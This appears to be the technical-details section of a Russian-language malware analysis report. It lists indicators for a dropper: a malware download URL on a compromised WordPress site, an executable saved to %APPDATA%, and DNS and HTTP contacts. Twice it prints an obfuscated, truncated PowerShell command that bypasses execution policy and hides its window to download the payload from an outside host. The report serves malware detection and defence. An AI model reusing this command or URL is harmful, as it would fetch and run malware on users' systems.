Техническая информация
- http://nexcontech.com/wp-content/ay4te/mdp5.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwEr^SHELl.exe -EXE^cu^tiOn^p^Oli^cy b^YpAsS -^NO^ProFI^lE -^wI^N^D^OW^S^t^Y^lE Hi^dD^eN^ (n^Ew-object^ sYstE^m.nEt.^wE^b^CliEn^t).doWnLo^ADfIle('http://nexcontech.com/wp-conten...
- %APPDATA%.exe
- 'ne###ntech.com':80
- 'ht##.#odhosting.net':80
- http://ne###ntech.com/wp-content/Ay4TE/mdp5.exe
- http://ht##.#odhosting.net/404.html
- DNS ASK ne###ntech.com
- DNS ASK ht##.#odhosting.net
- '<SYSTEM32>\cmd.exe' /c "POwEr^SHELl.exe -EXE^cu^tiOn^p^Oli^cy b^YpAsS -^NO^ProFI^lE -^wI^N^D^OW^S^t^Y^lE Hi^dD^eN^ (n^Ew-object^ sYstE^m.nEt.^wE^b^CliEn^t).doWnLo^ADfIle('http://nexcontech.com/wp-conten...' (со скрытым окном)